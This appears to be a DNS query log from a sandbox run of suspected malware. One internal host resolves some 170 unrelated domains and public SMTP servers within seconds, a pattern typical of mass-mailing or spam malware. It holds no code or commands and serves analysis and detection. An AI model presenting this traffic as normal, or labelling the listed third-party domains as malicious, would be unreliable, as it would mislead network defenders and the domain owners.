                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:25.328850985 CET192.168.2.68.8.8.80x7ee2Standard query (0)wolffkran.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:25.357629061 CET192.168.2.68.8.8.80x8b41Standard query (0)wolffkran.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:25.380311012 CET192.168.2.68.8.8.80xf2c0Standard query (0)wolffkran.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:25.439191103 CET192.168.2.68.8.8.80x208cStandard query (0)www.medisa.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:25.605148077 CET192.168.2.68.8.8.80x23edStandard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:25.607240915 CET192.168.2.68.8.8.80x792aStandard query (0)ikulani.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:25.655833006 CET192.168.2.68.8.8.80xdecbStandard query (0)hamaker.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:25.736825943 CET192.168.2.68.8.8.80x4057Standard query (0)karmy.com.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:25.775198936 CET192.168.2.68.8.8.80x5dc1Standard query (0)oozkranj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:25.794595003 CET192.168.2.68.8.8.80xed99Standard query (0)shanks.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:25.804800987 CET192.168.2.68.8.8.80xfe7Standard query (0)shanks.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:25.830126047 CET192.168.2.68.8.8.80xc4eeStandard query (0)amerifor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:25.830291033 CET192.168.2.68.8.8.80xb948Standard query (0)hazmatt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:25.858581066 CET192.168.2.68.8.8.80x341eStandard query (0)willsub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:25.876923084 CET192.168.2.68.8.8.80x37a0Standard query (0)cjcagent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:25.907916069 CET192.168.2.68.8.8.80x461Standard query (0)scip.org.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:25.908242941 CET192.168.2.68.8.8.80xe52fStandard query (0)cyclad.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:25.935553074 CET192.168.2.68.8.8.80x7406Standard query (0)portoccd.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:25.982460976 CET192.168.2.68.8.8.80x82b8Standard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:25.986670971 CET192.168.2.68.8.8.80xfcb8Standard query (0)www.usadig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:25.996896029 CET192.168.2.68.8.8.80x5ea8Standard query (0)shanks.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:26.005553961 CET192.168.2.68.8.8.80x1e46Standard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:26.027937889 CET192.168.2.68.8.8.80x3f26Standard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:26.093065977 CET192.168.2.68.8.8.80x7d54Standard query (0)eos-i.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:26.111179113 CET192.168.2.68.8.8.80xc130Standard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:26.128637075 CET192.168.2.68.8.8.80x3b8aStandard query (0)www.koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:26.131582022 CET192.168.2.68.8.8.80x7ff0Standard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:26.148647070 CET192.168.2.68.8.8.80x1e13Standard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:26.154278040 CET192.168.2.68.8.8.80xcabStandard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:26.173089981 CET192.168.2.68.8.8.80x75d4Standard query (0)uster.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:26.225711107 CET192.168.2.68.8.8.80x541dStandard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:26.227327108 CET192.168.2.68.8.8.80x7b07Standard query (0)pcoyuncu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:26.331269026 CET192.168.2.68.8.8.80x4ac5Standard query (0)uhsa.edu.agA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:26.476470947 CET192.168.2.68.8.8.80xc035Standard query (0)ludomemo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:26.476471901 CET192.168.2.68.8.8.80x5181Standard query (0)web-york.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:26.621443033 CET192.168.2.68.8.8.80x1d9aStandard query (0)fogra.com.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:26.632725954 CET192.168.2.68.8.8.80x9365Standard query (0)dog-jog.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:26.847938061 CET192.168.2.68.8.8.80x44b7Standard query (0)okashimo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:26.883610010 CET192.168.2.68.8.8.80x2734Standard query (0)kallman.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:26.883754969 CET192.168.2.68.8.8.80xce65Standard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:26.908273935 CET192.168.2.68.8.8.80x8604Standard query (0)nettlinx.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:26.913921118 CET192.168.2.68.8.8.80x6ff6Standard query (0)dayvo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:26.992851973 CET192.168.2.68.8.8.80xe05aStandard query (0)e-kami.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:26.995790958 CET192.168.2.68.8.8.80x224dStandard query (0)shanks.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:27.029373884 CET192.168.2.68.8.8.80xd793Standard query (0)tabbles.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:27.074923992 CET192.168.2.68.8.8.80xc87dStandard query (0)sgk.home.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:27.112147093 CET192.168.2.68.8.8.80x664eStandard query (0)fogra.com.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:27.150708914 CET192.168.2.68.8.8.80x9c72Standard query (0)dog-jog.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:27.201714993 CET192.168.2.68.8.8.80x4b4bStandard query (0)envogen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:27.287817955 CET192.168.2.68.8.8.80x316eStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:27.507663012 CET192.168.2.68.8.8.80xdda5Standard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:27.507956028 CET192.168.2.68.8.8.80x8729Standard query (0)riwn.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:27.528728962 CET192.168.2.68.8.8.80xce35Standard query (0)camamat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:27.595299006 CET192.168.2.68.8.8.80x1397Standard query (0)forbin.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:27.601826906 CET192.168.2.68.8.8.80x9951Standard query (0)ciicsc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:27.607872009 CET192.168.2.68.8.8.80xab11Standard query (0)smitko.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:27.628377914 CET192.168.2.68.8.8.80x9896Standard query (0)a-domani.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:27.672928095 CET192.168.2.68.8.8.80xbd74Standard query (0)usadig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:27.695936918 CET192.168.2.68.8.8.80x1833Standard query (0)daytonir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:27.696446896 CET192.168.2.68.8.8.80xba0Standard query (0)host.doA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:27.696532011 CET192.168.2.68.8.8.80x7d23Standard query (0)nrsi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:27.707973957 CET192.168.2.68.8.8.80x96d0Standard query (0)reproar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:27.725539923 CET192.168.2.68.8.8.80xabf5Standard query (0)willsub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:27.818818092 CET192.168.2.68.8.8.80xcf90Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:27.856684923 CET192.168.2.68.8.8.80xeca5Standard query (0)dwid.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:27.962855101 CET192.168.2.68.8.8.80xa7d6Standard query (0)tabbles.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:28.007644892 CET192.168.2.68.8.8.80x5e28Standard query (0)www.wnsavoy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:28.013195992 CET192.168.2.68.8.8.80x4d2Standard query (0)cbras.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:28.120932102 CET192.168.2.68.8.8.80x5e43Standard query (0)wolffkran.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:28.132981062 CET192.168.2.68.8.8.80x3c90Standard query (0)dog-jog.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:28.147491932 CET192.168.2.68.8.8.80x94c1Standard query (0)wolffkran.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:28.170566082 CET192.168.2.68.8.8.80xa7e1Standard query (0)wolffkran.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:28.233328104 CET192.168.2.68.8.8.80xa3f3Standard query (0)aba.org.egA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:28.234000921 CET192.168.2.68.8.8.80x3617Standard query (0)cbras.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:28.235892057 CET192.168.2.68.8.8.80x5f8eStandard query (0)banvari.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:28.241502047 CET192.168.2.68.8.8.80x541dStandard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:28.268414974 CET192.168.2.68.8.8.80xe513Standard query (0)rtcasey.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:28.287751913 CET192.168.2.6198.32.64.120x77Standard query (0)comNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:28.310107946 CET192.168.2.68.8.8.80xf15Standard query (0)zemarmot.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:28.616391897 CET192.168.2.68.8.8.80xef4aStandard query (0)scintel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:28.624161959 CET192.168.2.68.8.8.80xca88Standard query (0)mkm-gr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:28.633774042 CET192.168.2.68.8.8.80x5461Standard query (0)mcseurope.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:28.655184031 CET192.168.2.68.8.8.80xd2faStandard query (0)arowines.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:28.677191019 CET192.168.2.68.8.8.80xc37dStandard query (0)www.ex-olive.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:28.701872110 CET192.168.2.68.8.8.80x7672Standard query (0)dog-jog.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:28.742515087 CET192.168.2.68.8.8.80x219Standard query (0)siongann.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:28.743158102 CET192.168.2.68.8.8.80xd67bStandard query (0)n23china.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:28.765300989 CET192.168.2.68.8.8.80x378cStandard query (0)esmoke.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:28.835105896 CET192.168.2.68.8.8.80xcf90Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:29.027082920 CET192.168.2.68.8.8.80x3cffStandard query (0)madjek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:29.050771952 CET192.168.2.68.8.8.80x92d9Standard query (0)madjek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:29.073786974 CET192.168.2.68.8.8.80xea85Standard query (0)madjek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:29.074587107 CET192.168.2.68.8.8.80xcf77Standard query (0)camamat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:29.141283989 CET192.168.2.68.8.8.80x911aStandard query (0)k-nikko.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:29.184860945 CET192.168.2.68.8.8.80xd9a9Standard query (0)bount.com.twA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:29.264977932 CET192.168.2.68.8.8.80xd303Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:29.312705994 CET192.168.2.68.8.8.80xe686Standard query (0)onzcda.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:29.326039076 CET192.168.2.68.8.8.80x93d2Standard query (0)mijash3.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:29.405277967 CET192.168.2.68.8.8.80x1469Standard query (0)sidepath.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:29.460256100 CET192.168.2.68.8.8.80x195fStandard query (0)cjborden.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:29.507962942 CET192.168.2.68.8.8.80xca9eStandard query (0)fortknox.bmA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:29.612788916 CET192.168.2.68.8.8.80x4962Standard query (0)revoldia.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:29.653620958 CET192.168.2.68.8.8.80x1d57Standard query (0)wanoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:29.672211885 CET192.168.2.68.8.8.80x375cStandard query (0)yasuma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:29.672213078 CET192.168.2.68.8.8.80x2f07Standard query (0)jsaps.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:29.845244884 CET192.168.2.68.8.8.80xc7a5Standard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:29.879894018 CET192.168.2.68.8.8.80xe804Standard query (0)scip.org.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:29.890206099 CET192.168.2.68.8.8.80xcf90Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:29.907735109 CET192.168.2.68.8.8.80x40e8Standard query (0)smtp.compuserve.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:29.934077024 CET192.168.2.68.8.8.80x9d4fStandard query (0)ntc.edu.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:30.007776976 CET192.168.2.68.8.8.80x2929Standard query (0)cubodown.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:30.037816048 CET192.168.2.68.8.8.80xa178Standard query (0)redgiga.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:30.070833921 CET192.168.2.68.8.8.80x3ca6Standard query (0)pcoyuncu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:30.214034081 CET192.168.2.68.8.8.80xed9aStandard query (0)arowines.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:30.266100883 CET192.168.2.68.8.8.80x45b4Standard query (0)notis.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:30.272888899 CET192.168.2.68.8.8.80xd303Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:30.316287994 CET192.168.2.68.8.8.80xdc0Standard query (0)lpver.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:30.353727102 CET192.168.2.68.8.8.80x65d7Standard query (0)smtp.live.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:30.376406908 CET192.168.2.68.8.8.80x2828Standard query (0)popbook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:30.382683992 CET192.168.2.68.8.8.80x4996Standard query (0)anteph.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:30.414230108 CET192.168.2.68.8.8.80xa0bdStandard query (0)anteph.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:30.457108021 CET192.168.2.68.8.8.80xef41Standard query (0)biurohera.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:30.462471008 CET192.168.2.68.8.8.80xe02fStandard query (0)anteph.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:30.577740908 CET192.168.2.68.8.8.80xbf80Standard query (0)ie-roi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:30.578855991 CET192.168.2.68.8.8.80x10bcStandard query (0)noblesse.beA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:30.586390018 CET192.168.2.68.8.8.80x7dd7Standard query (0)amele.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:30.590356112 CET192.168.2.68.8.8.80x281Standard query (0)snf.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:30.630530119 CET192.168.2.68.8.8.80xa211Standard query (0)ie-roi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:30.638565063 CET192.168.2.68.8.8.80x1873Standard query (0)orbitgas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:30.676754951 CET192.168.2.68.8.8.80xe095Standard query (0)ie-roi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:30.686664104 CET192.168.2.68.8.8.80xca0cStandard query (0)shanks.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:30.690205097 CET192.168.2.68.8.8.80xf5cdStandard query (0)amele.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:30.696465969 CET192.168.2.68.8.8.80x65e9Standard query (0)siongann.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:30.701080084 CET192.168.2.68.8.8.80x4759Standard query (0)revoldia.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:30.737207890 CET192.168.2.68.8.8.80x13e1Standard query (0)gbmfg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:30.987425089 CET192.168.2.68.8.8.80xcf46Standard query (0)bosado.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:31.028645039 CET192.168.2.68.8.8.80x6904Standard query (0)host.doA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:31.055228949 CET192.168.2.68.8.8.80x9856Standard query (0)cvswl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:31.076512098 CET192.168.2.68.8.8.80x6ec3Standard query (0)unicus.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:31.117914915 CET192.168.2.68.8.8.80xd458Standard query (0)www.jchysk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:31.244349003 CET192.168.2.68.8.8.80x4583Standard query (0)rast.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:31.274830103 CET192.168.2.68.8.8.80xd303Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:31.407963037 CET192.168.2.68.8.8.80x180Standard query (0)refintl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:31.414303064 CET192.168.2.68.8.8.80x19f2Standard query (0)notis.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:31.414755106 CET192.168.2.68.8.8.80xef1dStandard query (0)geecl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:31.414953947 CET192.168.2.68.8.8.80xeb8Standard query (0)wnit.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:31.435415030 CET192.168.2.68.8.8.80xc848Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:31.624430895 CET192.168.2.68.8.8.80xfa96Standard query (0)eos-i.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:31.663146973 CET192.168.2.68.8.8.80x4779Standard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:31.678487062 CET192.168.2.68.8.8.80xf5cdStandard query (0)amele.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:31.709774971 CET192.168.2.68.8.8.80xa91bStandard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:31.718283892 CET192.168.2.68.8.8.80xffd8Standard query (0)amele.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:31.736004114 CET192.168.2.68.8.8.80x5bd9Standard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:31.740102053 CET192.168.2.68.8.8.80x7ddbStandard query (0)www.dayvo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:31.794761896 CET192.168.2.68.8.8.80x246eStandard query (0)sokuwan.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:31.840756893 CET192.168.2.68.8.8.80xe44aStandard query (0)okashimo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:31.847848892 CET192.168.2.68.8.8.80x3915Standard query (0)www.stajum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:31.878787041 CET192.168.2.68.8.8.80xdd2bStandard query (0)slower.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:31.899343014 CET192.168.2.68.8.8.80xcf90Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:31.906414986 CET192.168.2.68.8.8.80xd281Standard query (0)esmoke.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:40.133944035 CET192.168.2.68.8.8.80x6b16Standard query (0)t-mould.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:40.283521891 CET192.168.2.68.8.8.80x2116Standard query (0)scip.org.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:40.742917061 CET192.168.2.68.8.8.80x9c14Standard query (0)softizer.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:40.744038105 CET192.168.2.68.8.8.80xc873Standard query (0)kumaden.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:40.745321989 CET192.168.2.68.8.8.80xb800Standard query (0)ymlp15.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:40.746340990 CET192.168.2.68.8.8.80xbfa3Standard query (0)semuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:40.931849957 CET192.168.2.68.8.8.80x4536Standard query (0)kamptal.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:41.242777109 CET192.168.2.68.8.8.80xf37fStandard query (0)kustnara.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:41.508702993 CET192.168.2.68.8.8.80xc878Standard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:42.215396881 CET192.168.2.68.8.8.80x5e11Standard query (0)tabbles.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:42.400341034 CET192.168.2.68.8.8.80x7090Standard query (0)beafin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:44.102556944 CET192.168.2.68.8.8.80x38dbStandard query (0)sokuwan.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:45.346997023 CET192.168.2.68.8.8.80xe035Standard query (0)atis-sk.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:45.348207951 CET192.168.2.68.8.8.80x6415Standard query (0)msl-lock.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:45.349347115 CET192.168.2.68.8.8.80xbb28Standard query (0)pro-fa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:45.350440979 CET192.168.2.68.8.8.80xd24Standard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:45.489617109 CET192.168.2.68.8.8.80xff71Standard query (0)awal.wsA (IP address)IN (0x0001)false
